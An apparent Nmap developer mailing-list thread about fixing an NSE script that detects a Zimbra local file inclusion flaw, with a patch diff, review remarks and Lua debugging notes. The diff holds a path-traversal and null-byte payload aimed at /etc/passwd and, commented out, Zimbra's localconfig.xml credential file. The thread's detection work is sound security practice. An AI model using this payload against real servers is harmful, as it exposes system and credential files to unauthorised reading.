Nmap Development mailing list archives
Re: [NSE] Created NSE script to detect Zimbra 0 day
From: Paul AMAR <aos.paul () gmail com>
Date: Fri, 7 Feb 2014 10:10:11 +0100
Hi,

Got quite busy and I forgot about the task. Here is the patch:

Index: http-vuln-zimbra-lfi.nse =================================================================== --- http-vuln-zimbra-lfi.nse (revision 32704) +++ http-vuln-zimbra-lfi.nse (working copy) @@ -87,8 +87,8 @@ local file_long = "../../../../../../../../../etc/passwd" --local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml" - local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" - local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" + local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00" + local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00" stdnse.print_debug(1, "Trying to detect if the server is vulnerable") stdnse.print_debug(1, "GET " .. uri .. escape(url_short))

Cheers and thanks to Chris for reminding me.

2014-01-09 10:18 GMT+01:00 Paul AMAR <aos.paul () gmail com>:
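Review bot: the two `+` lines each repeat the full `/res/I18nMsg,...,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=` literal by hand, and the defect this hunk fixes (a `%` lost from `Ajx%20TemplateMsg`) is exactly the kind of drift two near-identical literals invite; suggest a single `local base = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin="` followed by `url_short = base .. file_short .. "%00"` and `url_long = base .. file_long .. "%00"`, so the prefix can only be wrong in one place. The unchanged context line `stdnse.print_debug(1, "GET " .. uri .. escape(url_short))` also deserves a check: if `escape` percent-encodes `%`, the `%20` and `%00` in `url_short` would go out as `%2520` and `%2500`, so confirm the real request is built the same way as the debug line (or escape only `file_short`/`file_long` before concatenation). The commented-out `--local file_long = .../opt/zimbra/conf/localconfig.xml` context line reads as leftover debugging and could be dropped in the same change.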
Hi there,

Got a remark from Chris Schatz, and actually, there are some '%' symbols missing in the urls starting line 90.

local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "00"
local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "00"

but it should be:

local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"

If you all agree, I'll submit a patch in the day to patch this.

Thanks Chris!

2013/12/20 Paul AMAR <aos.paul () gmail com>:

Hi,

Thanks for updating the script Ron. That's really weird that it was working for me though.
@George, thanks for the hint with the special character "-".

2013/12/19 Ron <ron () skullsecurity net>:

I fixed up the code quite a bit and submitted it on irc, it cleanly detects vulnerable and patched hosts now.

Ron

On 19 Dec 2013 10:34, George Chatzisofroniou <sophron () latthi com> wrote:

On Wed, Dec 18, 2013 at 06:18:57PM -0600, Ron wrote:
> The issue with the script as-is is, once the vuln is patched, it'll keep reporting it's vulnerable, I think, unless they just delete the file. If you try to grab a "bad" file (like /etc/shadow), everything seems to work fine.

There are some fixes around already. By fixing the LFI, the HTTP response status won't be 200, so the script will not return a false positive.

> It works if I switch out the string.match() with "==". I don't know why, though!

That's because the Lua string.match() method expects a pattern as a second argument (not a raw string) and the special "-" character is interpreted as the Lua modifier for repetitions. Thanks for catching this.
--
George Chatzisofroniou

_______________________________________________
Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
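A worked illustration of the string.match() point George makes in the quoted reply, added here and not part of the thread or of the http-vuln-zimbra-lfi.nse script; the response body and the header name used as the needle are constructed sample data:

```lua
-- Added example (not from the thread or from http-vuln-zimbra-lfi.nse):
-- a raw string passed to string.match() is read as a Lua pattern, so a
-- literal "-" in it becomes the lazy-repetition modifier and the match
-- silently fails. The body and needle below are constructed samples.

local body = "HTTP/1.1 200 OK\r\nX-Frame-Options: DENY\r\n\r\n"
          .. "root:x:0:0:root:/root:/bin/bash\n"
local needle = "X-Frame-Options"  -- "-" is a magic character in patterns

-- 1. As a pattern, "X-Frame-Options" means: zero or more "X" (lazy),
--    then "Fram", zero or more "e" (lazy), then "Options". The literal
--    "-" characters in the body are never matched, so this is nil.
local by_pattern = body:match(needle)

-- 2. string.find() with plain=true (4th argument) disables pattern
--    interpretation entirely and returns the start index (here 18).
local function contains_plain(haystack, s)
  return haystack:find(s, 1, true) ~= nil
end

-- 3. Escaping every magic character makes an arbitrary string usable
--    as a literal inside a pattern when pattern features are needed.
local function escape_pattern(s)
  return (s:gsub("[%^%$%(%)%%%.%[%]%*%+%-%?]", "%%%0"))
end
local by_escaped = body:match(escape_pattern(needle))

-- 4. Comparing with "==" (the workaround that worked in the thread) is
--    exact whole-string equality, so it only fits when the response is
--    expected to be precisely the needle and nothing more.
local whole_equal = (body == needle)

assert(by_pattern == nil)
assert(contains_plain(body, needle))
assert(by_escaped == "X-Frame-Options")
assert(whole_equal == false)
print("pattern match:", by_pattern, "plain find:", contains_plain(body, needle))
```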
Current thread:
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Jan 09)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Feb 07)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Daniel Miller (Feb 07)
- Re: [NSE] Created NSE script to detect Zimbra 0 day Paul AMAR (Feb 07)